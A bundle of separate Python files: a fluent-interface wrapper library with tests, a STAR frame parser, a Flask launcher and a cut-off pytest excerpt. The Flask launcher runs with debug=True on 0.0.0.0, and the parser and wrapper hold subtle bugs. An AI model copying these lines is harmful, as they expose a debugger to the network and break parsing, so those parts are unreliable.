that can be caught in python will be wrapped with the wrapper again.
This ensures that the fluent interface will persist and everything
that is returned is itself able to be chaned from again.
Using this wrapper changes the behaviour of python soure code in quite a big way.
a) If you wrap something, if you want to get at the real object from any
function call or attribute access off of that object, you will have to
explicitly unwrap it.
b) All returned objects will be enhanced by behaviour that matches the
wrapped type. I.e. iterables will gain the collection interface,
mappings will gain the mapping interface, strings will gain the
string interface, etc.
"""
def __init__(self, wrapped, *, previous, chain):
assert wrapped is not None or chain is not None, 'Cannot chain off of None'
self.__wrapped = wrapped
self.__previous = previous
self.__chain = chain
# Proxied methods
__getattr__ = wrapped(getattr)
__getitem__ = wrapped(operator.getitem)
def __str__(self):
return "fluent.wrap(%s)" % self.chain
def __repr__(self):
return "fluent.wrap(%r)" % self.chain
# REFACT consider wether I want to support all other operators too or wether explicit
# unwrapping is actually a better thing
__eq__ = unwrapped(operator.eq)
# Breakouts
@property
def unwrap(self):
return self.__wrapped
_ = unwrap # alias
@property
def previous(self):
return self.__previous
@property
def chain(self):
"Like .unwrap but handles chaining off of methods / functions that return None like SmallTalk does"
if self.unwrap is not None:
return self.unwrap
return self.__chain
# Utilities
@wrapped
def call(self, function, *args, **kwargs):
"Call function with self as first argument"
# Different from __call__! Calls function(self, …) instead of self(…)
return function(self, *args, **kwargs)
setattr = wrapped(setattr)
getattr = wrapped(getattr)
hasattr = wrapped(hasattr)
delattr = wrapped(delattr)
isinstance = wrapped(isinstance)
issubclass = wrapped(issubclass)
def tee(self, function):
"""Like tee on the shell
Calls the argument function with self, but then discards the result and allows
further chaining from self."""
function(self)
return self
dir = wrapped(dir)
vars = wrapped(vars)
virtual_root_module = object()
class Module(Wrapper):
"""Importer shortcut.
All attribute accesses to instances of this class are converted to
an import statement, but as an expression that returns the wrapped imported object.
Example:
>>> lib.sys.stdin.read().map(print)
Is equivalent to
>>> import importlib
>>> wrap(importlib.import_module('sys').stdin).read().map(print)
But of course without creating the intermediate symbol 'stdin' in the current namespace.
All objects returned from lib are pre-wrapped, so you can chain off of them immediately.
"""
def __getattr__(self, name):
if hasattr(self.chain, name):
return wrap(getattr(self.chain, name))
import importlib
module = None
if self.chain is virtual_root_module:
module = importlib.import_module(name)
else:
module = importlib.import_module('.'.join((self.chain.__name__, name)))
return wrap(module)
wrap.lib = lib = Module(virtual_root_module, previous=None, chain=None)
class Callable(Wrapper):
def __call__(self, *args, **kwargs):
""""Call through with a twist.
If one of the args is `wrap` / `_`, then this acts as a shortcut to curry instead"""
# REFACT consider to drop the auto curry - doesn't look like it is so super usefull
# REFACT Consider how to expand this so every method in the library supports auto currying
if wrap in args:
return self.curry(*args, **kwargs)
result = self.chain(*args, **kwargs)
chain = None if self.previous is None else self.previous.chain
return wrap(result, previous=self, chain=chain)
# REFACT rename to partial for consistency with stdlib?
# REFACT consider if there could be more utility in supporting placeholders for more usecases.
# examples:
# Switching argument order?
@wrapped
def curry(self, *curry_args, **curry_kwargs):
""""Like functools.partial, but with a twist.
If you use `wrap` or `_` as a positional argument, upon the actual call,
arguments will be left-filled for those placeholders.
For example:
>>> _(operator.add).curry(_, 'foo')('bar') == 'barfoo'
"""
placeholder = wrap
def merge_args(curried_args, args):
assert curried_args.count(placeholder) == len(args), \
'Need the right ammount of arguments for the placeholders'
new_args = list(curried_args)
if placeholder in curried_args:
index = 0
for arg in args:
index = new_args.index(placeholder, index)
new_args[index] = arg
return new_args
@functools.wraps(self)
def wrapper(*actual_args, **actual_kwargs):
return self(
*merge_args(curry_args, actual_args),
**dict(curry_kwargs, **actual_kwargs)
)
return wrapper
@wrapped
def compose(self, outer):
return lambda *args, **kwargs: outer(self(*args, **kwargs))
# REFACT consider aliasses wrap = chain = cast = compose
class Iterable(Wrapper):
"""Add iterator methods to any iterable.
Most iterators in python3 return an iterator by default, which is very interesting
if you want to build efficient processing pipelines, but not so hot for quick and
dirty scripts where you have to wrap the result in a list() or tuple() all the time
to actually get at the results (e.g. to print them) or to actually trigger the
computation pipeline.
Thus all iterators on this class are by default immediate, i.e. they don't return the
iterator but instead consume it immediately and return a tuple. Of course if needed,
there is also an i{map,zip,enumerate,...} version for your enjoyment that returns the
iterator.
"""
__iter__ = unwrapped(iter)
@wrapped
def star_call(self, function, *args, **kwargs):
"Calls function(*self), but allows to prepend args and add kwargs."
return function(*args, *self, **kwargs)
# This looks like it should be the same as
# starcall = wrapped(lambda function, wrapped, *args, **kwargs: function(*wrapped, *args, **kwargs))
# but it's not. Why?
@wrapped
def join(self, with_what):
""""Like str.join, but the other way around. Bohoo!
Also calls str on all elements of the collection before handing
it off to str.join as a convenience.
"""
return with_what.join(map(str, self))
## Reductors .........................................
len = wrapped(len)
max = wrapped(max)
min = wrapped(min)
sum = wrapped(sum)
any = wrapped(any)
all = wrapped(all)
reduce = wrapped_forward(functools.reduce)
## Iterators .........................................
imap = wrapped_forward(map)
map = tupleize(imap)
istar_map = istarmap = wrapped_forward(itertools.starmap)
star_map = starmap = tupleize(istarmap)
ifilter = wrapped_forward(filter)
filter = tupleize(ifilter)
ienumerate = wrapped(enumerate)
enumerate = tupleize(ienumerate)
ireversed = wrapped(reversed)
reversed = tupleize(ireversed)
isorted = wrapped(sorted)
sorted = tupleize(isorted)
@wrapped
def igrouped(self, group_length):
"s -> (s0,s1,s2,...sn-1), (sn,sn+1,sn+2,...s2n-1), (s2n,s2n+1,s2n+2,...s3n-1), ..."
return zip(*[iter(self)]*group_length)
grouped = tupleize(igrouped)
izip = wrapped(zip)
zip = tupleize(izip)
@wrapped
def iflatten(self, level=math.inf):
"Modeled after rubys array.flatten @see http://ruby-doc.org/core-1.9.3/Array.html#method-i-flatten"
for element in self:
if level > 0 and isinstance(element, typing.Iterable):
for subelement in _(element).iflatten(level=level-1):
yield subelement
else:
yield element
return
flatten = tupleize(iflatten)
igroupby = wrapped(itertools.groupby)
def groupby(self, *args, **kwargs):
# Need an extra wrapping function to consume the deep iterators in time
result = []
for key, values in self.igroupby(*args, **kwargs):
result.append((key, tuple(values)))
return wrap(tuple(result))
def tee(self, function):
"This override tries to retain iterators, as a speedup"
if hasattr(self.chain, '__next__'): # iterator
first, second = itertools.tee(self.chain, 2)
function(wrap(first, previous=self))
return wrap(second, previous=self)
else:
return super().tee(function)
class Mapping(Iterable):
def __getattr__(self, name):
"Support JavaScript like dict item access via attribute access"
if name in self.chain:
return self[name]
return super().__getattr__(self, name)
@wrapped
def star_call(self, function, *args, **kwargs):
"Calls function(**self), but allows to add args and set defaults for kwargs."
return function(*args, **dict(kwargs, **self))
class Set(Iterable): pass
class Text(Wrapper):
"Supports most of the regex methods as if they where native str methods"
# Regex Methods ......................................
search = wrapped_forward(re.search)
match = wrapped_forward(re.match)
fullmatch = wrapped_forward(re.match)
split = wrapped_forward(re.split)
findall = wrapped_forward(re.findall)
# REFACT consider ifind and find in the spirit of the collection methods?
finditer = wrapped_forward(re.finditer)
sub = wrapped_forward(re.sub, self_index=2)
subn = wrapped_forward(re.subn, self_index=2)
def make_operator(name):
__op__ = getattr(operator, name)
@functools.wraps(__op__)
def wrapper(self, *others):
return wrap(__op__).curry(wrap, *others)
return wrapper
class Each(Wrapper):
for name in dir(operator):
if not name.startswith('__'):
continue
locals()[name] = make_operator(name)
@wrapped
def __getattr__(self, name):
return operator.attrgetter(name)
@wrapped
def __getitem__(self, index):
return operator.itemgetter(index)
@property
def call(self):
class MethodCallerConstructor(object):
_method_name = None
def __getattr__(self, method_name):
self._method_name = method_name
return self
def __call__(self, *args, **kwargs):
assert self._method_name is not None, \
'Need to access the method to call first! E.g. _.each.call.method_name(arg1, kwarg="arg2")'
return wrap(operator.methodcaller(self._method_name, *args, **kwargs))
return MethodCallerConstructor()
each_marker = object()
wrap.each = Each(each_marker, previous=None, chain=None)
import unittest
from pyexpect import expect
import pytest
class FluentTest(unittest.TestCase): pass
class WrapperTest(FluentTest):
def test_should_not_wrap_a_wrapper_again(self):
wrapped = _(4)
expect(type(_(wrapped).unwrap)) == int
def test_should_provide_usefull_str_and_repr_output(self):
expect(repr(_('foo'))) == "fluent.wrap('foo')"
expect(str(_('foo'))) == "fluent.wrap(foo)"
def test_should_wrap_callables(self):
counter = [0]
def foo(): counter[0] += 1
expect(_(foo)).is_instance(Wrapper)
_(foo)()
expect(counter[0]) == 1
def test_should_wrap_attribute_accesses(self):
class Foo(): bar = 'baz'
expect(_(Foo()).bar).is_instance(Wrapper)
def test_should_wrap_item_accesses(self):
expect(_(dict(foo='bar'))['foo']).is_instance(Wrapper)
def test_should_error_when_accessing_missing_attribute(self):
class Foo(): pass
expect(lambda: _(Foo().missing)).to_raise(AttributeError)
def test_should_explictly_unwrap(self):
foo = 1
expect(_(foo).unwrap).is_(foo)
def test_should_wrap_according_to_returned_type(self):
expect(_('foo')).is_instance(Text)
expect(_([])).is_instance(Iterable)
expect(_(iter([]))).is_instance(Iterable)
expect(_({})).is_instance(Mapping)
expect(_({1})).is_instance(Set)
expect(_(lambda: None)).is_instance(Callable)
class CallMe(object):
def __call__(self): pass
expect(_(CallMe())).is_instance(Callable)
expect(_(object())).is_instance(Wrapper)
def test_should_remember_call_chain(self):
def foo(): return 'bar'
expect(_(foo)().unwrap) == 'bar'
expect(_(foo)().previous.unwrap) == foo
def test_should_delegate_equality_test_to_wrapped_instance(self):
# REFACT makes these tests much nicer - but probably has to go to make this library less virus like
expect(_(1)) == 1
expect(_('42')) == '42'
callme = lambda: None
expect(_(callme)) == callme
def test_hasattr_getattr_setattr_delattr(self):
expect(_((1,2)).hasattr('len'))
expect(_('foo').getattr('__len__')()) == 3
class Attr(object):
def __init__(self): self.foo = 'bar'
expect(_(Attr()).setattr('foo', 'baz').foo) == 'baz'
expect(_(Attr()).delattr('foo').unwrap) == None
expect(_(Attr()).delattr('foo').chain).isinstance(Attr)
expect(_(Attr()).delattr('foo').vars()) == {}
def test_isinstance_issubclass(self):
expect(_('foo').isinstance(str)) == True
expect(_('foo').isinstance(int)) == False
expect(_(str).issubclass(object)) == True
expect(_(str).issubclass(str)) == True
expect(_(str).issubclass(int)) == False
def test_dir_vars(self):
expect(_(object()).dir()).contains('__class__', '__init__', '__eq__')
class Foo(object): pass
foo = Foo()
foo.bar = 'baz'
expect(_(foo).vars()) == {'bar': 'baz'}
class CallableTest(FluentTest):
def test_call(self):
expect(_(lambda: 3)()) == 3
expect(_(lambda *x: x)(1,2,3)) == (1,2,3)
expect(_(lambda x=3: x)()) == 3
expect(_(lambda x=3: x)(x=4)) == 4
expect(_(lambda x=3: x)(4)) == 4
def test_star_call(self):
expect(wrap([1,2,3]).star_call(str.format, '{} - {} : {}')) == '1 - 2 : 3'
def test_should_call_callable_with_wrapped_as_first_argument(self):
expect(_([1,2,3]).call(min)) == 1
expect(_([1,2,3]).call(min)) == 1
expect(_('foo').call(str.upper)) == 'FOO'
expect(_('foo').call(str.upper)) == 'FOO'
def test_tee_breakout_a_function_with_side_effects_and_disregard_return_value(self):
side_effect = {}
def observer(a_list): side_effect['tee'] = a_list.join('-')
expect(_([1,2,3]).tee(observer)) == [1,2,3]
expect(side_effect['tee']) == '1-2-3'
def fnording(ignored): return 'fnord'
expect(_([1,2,3]).tee(fnording)) == [1,2,3]
def test_curry(self):
expect(_(lambda x, y: x*y).curry(2, 3)()) == 6
expect(_(lambda x=1, y=2: x*y).curry(x=3)()) == 6
def test_auto_currying(self):
expect(_(lambda x: x + 3)(_)(3)) == 6
expect(_(lambda x, y: x + y)(_, 'foo')('bar')) == 'barfoo'
expect(_(lambda x, y: x + y)('foo', _)('bar')) == 'foobar'
def test_curry_should_support_placeholders_to_curry_later_positional_arguments(self):
expect(_(operator.add).curry(_, 'foo')('bar')) == 'barfoo'
expect(_(lambda x, y, z: x + y + z).curry(_, 'baz', _)('foo', 'bar')) == 'foobazbar'
# expect(_(operator.add).curry(_2, _1)('foo', 'bar')) == 'barfoo'
def test_compose_cast_wraps_chain(self):
expect(_(lambda x: x*2).compose(lambda x: x+3)(5)) == 13
expect(_(str.strip).compose(str.capitalize)(' fnord ')) == 'Fnord'
class SmallTalkLikeBehaviour(FluentTest):
def test_should_pretend_methods_that_return_None_returned_self(self):
expect(_([3,2,1]).sort().unwrap) == None
expect(_([3,2,1]).sort().previous.previous) == [1,2,3]
expect(_([3,2,1]).sort().chain) == [1,2,3]
expect(_([2,3,1]).sort().sort(reverse=True).unwrap) == None
expect(_([2,3,1]).sort().sort(reverse=True).previous.previous.previous.previous) == [3,2,1]
expect(_([2,3,1]).sort().sort(reverse=True).chain) == [3,2,1]
def test_should_chain_off_of_previous_if_our_functions_return_none(self):
class Attr(object):
foo = 'bar'
expect(_(Attr()).setattr('foo', 'baz').foo) == 'baz'
# TODO check individually that the different forms of wrapping behave according to the SmallTalk contract
# wrapped
# unwrapped
# wrapped_forward
class IterableTest(FluentTest):
def test_should_call_callable_with_star_splat_of_self(self):
expect(_([1,2,3]).star_call(lambda x, y, z: z-x-y)) == 0
def test_join(self):
expect(_(['1','2','3']).join(' ')) == '1 2 3'
expect(_([1,2,3]).join(' ')) == '1 2 3'
def test_any(self):
expect(_((True, False)).any()) == True
expect(_((False, False)).any()) == False
def test_all(self):
expect(_((True, False)).all()) == False
expect(_((True, True)).all()) == True
def test_len(self):
expect(_((1,2,3)).len()) == 3
def test_min_max_sum(self):
expect(_([1,2]).min()) == 1
expect(_([1,2]).max()) == 2
expect(_((1,2,3)).sum()) == 6
def test_map(self):
expect(_([1,2,3]).imap(lambda x: x * x).call(list)) == [1, 4, 9]
expect(_([1,2,3]).map(lambda x: x * x)) == (1, 4, 9)
def test_starmap(self):
expect(_([(1,2), (3,4)]).istarmap(lambda x, y: x+y).call(list)) == [3, 7]
expect(_([(1,2), (3,4)]).starmap(lambda x, y: x+y)) == (3, 7)
def test_filter(self):
expect(_([1,2,3]).ifilter(lambda x: x > 1).call(list)) == [2,3]
expect(_([1,2,3]).filter(lambda x: x > 1)) == (2,3)
def test_zip(self):
expect(_((1,2)).izip((3,4)).call(tuple)) == ((1, 3), (2, 4))
expect(_((1,2)).izip((3,4), (5,6)).call(tuple)) == ((1, 3, 5), (2, 4, 6))
expect(_((1,2)).zip((3,4))) == ((1, 3), (2, 4))
expect(_((1,2)).zip((3,4), (5,6))) == ((1, 3, 5), (2, 4, 6))
def test_reduce(self):
# no iterator version of reduce as it's not a mapping
expect(_((1,2)).reduce(operator.add)) == 3
def test_grouped(self):
expect(_((1,2,3,4,5,6)).igrouped(2).call(list)) == [(1,2), (3,4), (5,6)]
expect(_((1,2,3,4,5,6)).grouped(2)) == ((1,2), (3,4), (5,6))
expect(_((1,2,3,4,5)).grouped(2)) == ((1,2), (3,4))
def test_group_by(self):
actual = {}
for key, values in _((1,1,2,2,3,3)).igroupby():
actual[key] = tuple(values)
expect(actual) == {
1: (1,1),
2: (2,2),
3: (3,3)
}
actual = {}
for key, values in _((1,1,2,2,3,3)).groupby():
actual[key] = tuple(values)
expect(actual) == {
1: (1,1),
2: (2,2),
3: (3,3)
}
def test_tee_should_not_break_iterators(self):
# This should work because the extend as well als the .call(list)
# should not exhaust the iterator created by .imap()
recorder = []
def record(generator): recorder.extend(generator)
expect(_([1,2,3]).imap(lambda x: x*x).tee(record).call(list)) == [1,4,9]
expect(recorder) == [1,4,9]
def test_enumerate(self):
expect(_(('foo', 'bar')).ienumerate().call(list)) == [(0, 'foo'), (1, 'bar')]
expect(_(('foo', 'bar')).enumerate()) == ((0, 'foo'), (1, 'bar'))
def test_reversed_sorted(self):
expect(_([2,1,3]).ireversed().call(list)) == [3,1,2]
expect(_([2,1,3]).reversed()) == (3,1,2)
expect(_([2,1,3]).isorted().call(list)) == [1,2,3]
expect(_([2,1,3]).sorted()) == (1,2,3)
expect(_([2,1,3]).isorted(reverse=True).call(list)) == [3,2,1]
expect(_([2,1,3]).sorted(reverse=True)) == (3,2,1)
def test_flatten(self):
expect(_([(1,2),[3,4],(5, [6,7])]).iflatten().call(list)) == \
[1,2,3,4,5,6,7]
expect(_([(1,2),[3,4],(5, [6,7])]).flatten()) == \
(1,2,3,4,5,6,7)
expect(_([(1,2),[3,4],(5, [6,7])]).flatten(level=1)) == \
(1,2,3,4,5,[6,7])
class MappingTest(FluentTest):
def test_should_call_callable_with_double_star_splat_as_keyword_arguments(self):
def foo(*, foo): return foo
expect(_(dict(foo='bar')).star_call(foo)) == 'bar'
expect(_(dict(foo='baz')).star_call(foo, foo='bar')) == 'baz'
expect(_(dict()).star_call(foo, foo='bar')) == 'bar'
def test_should_support_attribute_access_to_mapping_items(self):
expect(_(dict(foo='bar')).foo) == 'bar'
class StrTest(FluentTest):
def test_search(self):
expect(_('foo bar baz').search(r'b.r').span()) == (4,7)
def test_match_fullmatch(self):
expect(_('foo bar').match(r'foo\s').span()) == (0, 4)
expect(_('foo bar').fullmatch(r'foo\sbar').span()) == (0, 7)
def test_split(self):
expect(_('foo\nbar\nbaz').split(r'\n')) == ['foo', 'bar', 'baz']
expect(_('foo\nbar/baz').split(r'[\n/]')) == ['foo', 'bar', 'baz']
def test_findall_finditer(self):
expect(_("bazfoobar").findall('ba[rz]')) == ['baz', 'bar']
expect(_("bazfoobar").finditer('ba[rz]').map(_.each.call.span())) == ((0,3), (6,9))
def test_sub_subn(self):
expect(_('bazfoobar').sub(r'ba.', 'foo')) == 'foofoofoo'
expect(_('bazfoobar').sub(r'ba.', 'foo', 1)) == 'foofoobar'
expect(_('bazfoobar').sub(r'ba.', 'foo', count=1)) == 'foofoobar'
class ImporterTest(FluentTest):
def test_import_top_level_module(self):
import sys
expect(lib.sys) == sys
def test_import_symbol_from_top_level_module(self):
import sys
expect(lib.sys.stdin) == sys.stdin
def test_import_submodule_that_is_also_a_symbol_in_the_parent_module(self):
import os
expect(lib.os.name) == os.name
expect(lib.os.path.join) == os.path.join
def test_import_submodule_that_is_not_a_symbol_in_the_parent_module(self):
import dbm
expect(lambda: dbm.dumb).to_raise(AttributeError)
def delayed_import():
import dbm.dumb
return dbm.dumb
expect(lib.dbm.dumb) == delayed_import()
def test_imported_objects_are_pre_wrapped(self):
lib.os.path.join('/foo', 'bar', 'baz').findall(r'/(\w*)') == ['foo', 'bar', 'baz']
class EachTest(FluentTest):
def test_should_produce_attrgetter_on_attribute_access(self):
class Foo(object):
bar = 'baz'
expect(_([Foo(), Foo()]).map(_.each.bar)) == ('baz', 'baz')
def test_should_produce_itemgetter_on_item_access(self):
expect(_([['foo'], ['bar']]).map(_.each[0])) == ('foo', 'bar')
def test_should_produce_callable_on_binary_operator(self):
expect(_(['foo', 'bar']).map(_.each == 'foo')) == (True, False)
expect(_([3, 5]).map(_.each + 3)) == (6, 8)
expect(_([3, 5]).map(_.each < 4)) == (True, False)
def test_should_produce_callable_on_unary_operator(self):
expect(_([3, 5]).map(- _.each)) == (-3, -5)
expect(_([3, 5]).map(~ _.each)) == (-4, -6)
def test_should_produce_methodcaller_on_call_attribute(self):
# problem: _.each.call is now not an attrgetter
# _.each.method.call('foo') # like a method chaining
# _.each_call.method('foo')
# _.eachcall.method('foo')
class Tested(object):
def method(self, arg): return 'method+'+arg
expect(_(Tested()).call(_.each.call.method('argument'))) == 'method+argument'
expect(lambda: _.each.call('argument')).to_raise(AssertionError, '_.each.call.method_name')
class IntegrationTest(FluentTest):
def test_extrac_and_decode_URIs(self):
from xml.sax.saxutils import unescape
line = '''<td><img src='/sitefiles/star_5.png' height='15' width='75' alt=''></td>
<td><input style='width:200px; outline:none; border-style:solid; border-width:1px; border-color:#ccc;' type='text' id='ydxerpxkpcfqjaybcssw' readonly='readonly' onClick="select_text('ydxerpxkpcfqjaybcssw');" value='http://list.iblocklist.com/?list=ydxerpxkpcfqjaybcssw&fileformat=p2p&archiveformat=gz'></td>'''
actual = _(line).findall(r'value=\'(.*)\'').imap(unescape).call(list)
expect(actual) == ['http://list.iblocklist.com/?list=ydxerpxkpcfqjaybcssw&fileformat=p2p&archiveformat=gz']
def test_call_module_from_shell(self):
from subprocess import check_output
output = check_output(
['python', '-m', 'fluent', "lib.sys.stdin.read().split('\\n').imap(str.upper).imap(print).call(list)"],
input=b'foo\nbar\nbaz')
expect(output) == b'FOO\nBAR\nBAZ\n'
if __name__ == '__main__':
import sys
assert len(sys.argv) == 2, \
"Usage: python -m fluent 'some code that can access fluent functions without having to import them'"
exec(sys.argv[1], dict(wrap=wrap, _=_, lib=lib))
|
from collections import OrderedDict as odict
from values import decode_kv_pairs, encode_kv_pairs
from loops import decode_loops, encode_loops
def split_frames(lines):
'''
splits a list of lines into lines that are not part of a frame,
and a list of lines, where each list is part of the same frame.
frames start with a `save_` and end with a `stop_`. They also
end with the next data block, but this function is only called
with lines from a single data block.
'''
def parse_frame_name(line):
return line.split()[0][len('save_'):]
def frame_starts(line):
return line.startswith('save_')
def frame_stops(line):
return line.startswith('stop_')
outer = []
frame = None
frames = odict()
for line in lines:
if frame_stops(line):
frame = None
elif frame_starts(line):
name = parse_frame_name(line, 'save_')
if name not in frames:
frames[name] = []
frame = frames[name]
elif frame is None:
outer.append(line)
else:
frame.append(line)
return outer, frames
def decode_frames(lines):
outer, frames = split_frames(lines)
for key in frames:
frames[key] = decode_frame(frames[key])
return outer, frames
def decode_frame(lines):
outer, loops = decode_loops(lines)
frame = decode_kv_pairs(outer)
for key in loops:
frame[key] = loops[key]
return frame
def encode_frames(block):
def block_frames(block):
return [(k, block[k]) for k in block if isinstance(block[k], dict)]
lines = []
for name, frame in block_frames(block):
lines.append('save_%s' % name)
lines.append(encode_frame(frame))
lines.append('stop_')
return '\n'.join(lines)
def encode_frame(frame):
lines = []
lines.append(encode_kv_pairs(frame))
lines.append(encode_loops(frame))
return '\n'.join(lines)
|
from lighthouse import app
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True)
|
""" Python test discovery, setup and run of test functions. """
import re
import fnmatch
import functools
import py
import inspect
import sys
import pytest
from _pytest.mark import MarkDecorator, MarkerError
from py._code.code import TerminalRepr
try:
import enum
except ImportError: # pragma: no cover
# Only available in Python 3.4+ or as a backport
enum = None
import _pytest
import pluggy
cutdir2 = py.path.local(_pytest.__file__).dirpath()
cutdir1 = py.path.local(pluggy.__file__.rstrip("oc"))
NoneType = type(None)
NOTSET = object()
isfunction = inspect.isfunction
isclass = inspect.isclass
callable = py.builtin.callable
exc_clear = getattr(sys, 'exc_clear', lambda: None)
REGEX_TYPE = type(re.compile(''))
def filter_traceback(entry):
return entry.path != cutdir1 and not entry.path.relto(cutdir2)
def get_real_func(obj):
""" gets the real function object of the (possibly) wrapped object by
functools.wraps or functools.partial.
"""
while hasattr(obj, "__wrapped__"):
obj = obj.__wrapped__
if isinstance(obj, functools.partial):
obj = obj.func
return obj
def getfslineno(obj):
# xxx let decorators etc specify a sane ordering
obj = get_real_func(obj)
if hasattr(obj, 'place_as'):
obj = obj.place_as
fslineno = py.code.getfslineno(obj)
assert isinstance(fslineno[1], int), obj
return fslineno
def getimfunc(func):
try:
return func.__func__
except AttributeError:
try:
return func.im_func
except AttributeError:
return func
def safe_getattr(object, name, default):
""" Like getattr but return default upon any Exception.
Attribute access can potentially fail for 'evil' Python objects.
See issue214
"""
try:
return getattr(object, name, default)
except Exception:
return default
class FixtureFunctionMarker:
def __init__(self, scope, params,
autouse=False, yieldctx=False, ids=None):
self.scope = scope
self.params = params
self.autouse = autouse
self.yieldctx = yieldctx
self.ids = ids
def __call__(self, function):
if isclass(function):
raise ValueError(
"class fixtures not supported (may be in the future)")
function._pytestfixturefunction = self
return function
def fixture(scope="function", params=None, autouse=False, ids=None):
""" (return a) decorator to mark a fixture factory function.
This decorator can be used (with or or without parameters) to define
a fixture function. The name of the fixture function can later be
referenced to cause its invocation ahead of running tests: test
modules or classes can use the pytest.mark.usefixtures(fixturename)
marker. Test functions can directly use fixture names as input
arguments in which case the fixture instance returned from the fixture
function will be injected.
:arg scope: the scope for which this fixture is shared, one of
"function" (default), "class", "module", "session".
:arg params: an optional list of parameters which will cause multiple
invocations of the fixture function and all of the tests
using it.
:arg autouse: if True, the fixture func is activated for all tests that
can see it. If False (the default) then an explicit
reference is needed to activate the fixture.
:arg ids: list of string ids each corresponding to the params
so that they are part of the test id. If no ids are provided
they will be generated automatically from the params.
"""
if callable(scope) and params is None and autouse == False:
# direct decoration
return FixtureFunctionMarker(
"function", params, autouse)(scope)
if params is not None and not isinstance(params, (list, tuple)):
params = list(params)
return FixtureFunctionMarker(scope, params, autouse, ids=ids)
def yield_fixture(scope="function", params=None, autouse=False, ids=None):
""" (return a) decorator to mark a yield-fixture factory function
(EXPERIMENTAL).
This takes the same arguments as :py:func:`pytest.fixture` but
expects a fixture function to use a ``yield`` instead of a ``return``
statement to provide a fixture. See
http://pytest.org/en/latest/yieldfixture.html for more info.
"""
if callable(scope) and params is None and autouse == False:
# direct decoration
return FixtureFunctionMarker(
"function", params, autouse, yieldctx=True)(scope)
else:
return FixtureFunctionMarker(scope, params, autouse,
yieldctx=True, ids=ids)
defaultfuncargprefixmarker = fixture()
def pyobj_property(name):
def get(self):
node = self.getparent(getattr(pytest, name))
if node is not None:
return node.obj
doc = "python %s object this node was collected from (can be None)." % (
name.lower(),)
return property(get, None, None, doc)
def pytest_addoption(parser):
group = parser.getgroup("general")
group.addoption('--fixtures', '--funcargs',
action="store_true", dest="showfixtures", default=False,
help="show available fixtures, sorted by plugin appearance")
parser.addini("usefixtures", type="args", default=[],
help="list of default fixtures to be used with this project")
parser.addini("python_files", type="args",
default=['test_*.py', '*_test.py'],
help="glob-style file patterns for Python test module discovery")
parser.addini("python_classes", type="args", default=["Test",],
help="prefixes or glob names for Python test class discovery")
parser.addini("python_functions", type="args", default=["test",],
help="prefixes or glob names for Python test function and "
"method discovery")
def pytest_cmdline_main(config):
if config.option.showfixtures:
showfixtures(config)
return 0
def pytest_generate_tests(metafunc):
# those alternative spellings are common - raise a specific error to alert
# the user
alt_spellings = ['parameterize', 'parametrise', 'parameterise']
for attr in alt_spellings:
if hasattr(metafunc.function, attr):
msg = "{0} has '{1}', spelling should be 'parametrize'"
raise MarkerError(msg.format(metafunc.function.__name__, attr))
try:
markers = metafunc.function.parametrize
except AttributeError:
return
for marker in markers:
metafunc.parametrize(*marker.args, **marker.kwargs)
def pytest_configure(config):
config.addinivalue_line("markers",
"parametrize(argnames, argvalues): call a test function multiple "
"times passing in different arguments in turn. argvalues generally "
"needs to be a list of values if argnames specifies only one name "
"or a list of tuples of values if argnames specifies multiple names. "
"Example: @parametrize('arg1', [1,2]) would lead to two calls of the "
"decorated test function, one with arg1=1 and another with arg1=2."
"see http://pytest.org/latest/parametrize.html for more info and "
"examples."
)
config.addinivalue_line("markers",
"usefixtures(fixturename1, fixturename2, ...): mark tests as needing "
"all of the specified fixtures. see http://pytest.org/latest/fixture.html#usefixtures "
)
def pytest_sessionstart(session):
session._fixturemanager = FixtureManager(session)
@pytest.hookimpl(trylast=True)
def pytest_namespace():
raises.Exception = pytest.fail.Exception
return {
'fixture': fixture,
'yield_fixture': yield_fixture,
'raises' : raises,
'collect': {
'Module': Module, 'Class': Class, 'Instance': Instance,
'Function': Function, 'Generator': Generator,
'_fillfuncargs': fillfixtures}
}
@fixture(scope="session")
def pytestconfig(request):
""" the pytest config object with access to command line opts."""
return request.config
@pytest.hookimpl(trylast=True)
def pytest_pyfunc_call(pyfuncitem):
testfunction = pyfuncitem.obj
if pyfuncitem._isyieldedfunction():
testfunction(*pyfuncitem._args)
else:
funcargs = pyfuncitem.funcargs
testargs = {}
for arg in pyfuncitem._fixtureinfo.argnames:
testargs[arg] = funcargs[arg]
testfunction(**testargs)
return True
def pytest_collect_file(path, parent):
ext = path.ext
if ext == ".py":
if not parent.session.isinitpath(path):
for pat in parent.config.getini('python_files'):
if path.fnmatch(pat):
break
else:
return
ihook = parent.session.gethookproxy(path)
return ihook.pytest_pycollect_makemodule(path=path, parent=parent)
def pytest_pycollect_makemodule(path, parent):
return Module(path, parent)
@pytest.hookimpl(hookwrapper=True)
def pytest_pycollect_makeitem(collector, name, obj):
outcome = yield
res = outcome.get_result()
if res is not None:
raise StopIteration
# nothing was collected elsewhere, let's do it here
if isclass(obj):
if collector.istestclass(obj, name):
Class = collector._getcustomclass("Class")
outcome.force_result(Class(name, parent=collector))
elif collector.istestfunction(obj, name):
# mock seems to store unbound methods (issue473), normalize it
obj = getattr(obj, "__func__", obj)
if not isfunction(obj):
collector.warn(code="C2", message=
"cannot collect %r because it is not a function."
% name, )
if getattr(obj, "__test__", True):
if is_generator(obj):
res = Generator(name, parent=collector)
else:
res = list(collector._genfunctions(name, obj))
outcome.force_result(res)
def is_generator(func):
try:
return py.code.getrawcode(func).co_flags & 32 # generator function
except AttributeError: # builtin functions have no bytecode
# assume them to not be generators
return False
class PyobjContext(object):
module = pyobj_property("Module")
cls = pyobj_property("Class")
instance = pyobj_property("Instance")
class PyobjMixin(PyobjContext):
def obj():
def fget(self):
try:
return self._obj
except AttributeError:
self._obj = obj = self._getobj()
return obj
def fset(self, value):
self._obj = value
return property(fget, fset, None, "underlying python object")
obj = obj()
def _getobj(self):
return getattr(self.parent.obj, self.name)
def getmodpath(self, stopatmodule=True, includemodule=False):
""" return python path relative to the containing module. """
chain = self.listchain()
chain.reverse()
parts = []
for node in chain:
if isinstance(node, Instance):
continue
name = node.name
if isinstance(node, Module):
assert name.endswith(".py")
name = name[:-3]
if stopatmodule:
if includemodule:
parts.append(name)
break
parts.append(name)
parts.reverse()
s = ".".join(parts)
return s.replace(".[", "[")
def _getfslineno(self):
return getfslineno(self.obj)
def reportinfo(self):
# XXX caching?
obj = self.obj
if hasattr(obj, 'compat_co_firstlineno'):
# nose compatibility
fspath = sys.modules[obj.__module__].__file__
if fspath.endswith(".pyc"):
fspath = fspath[:-1]
lineno = obj.compat_co_firstlineno
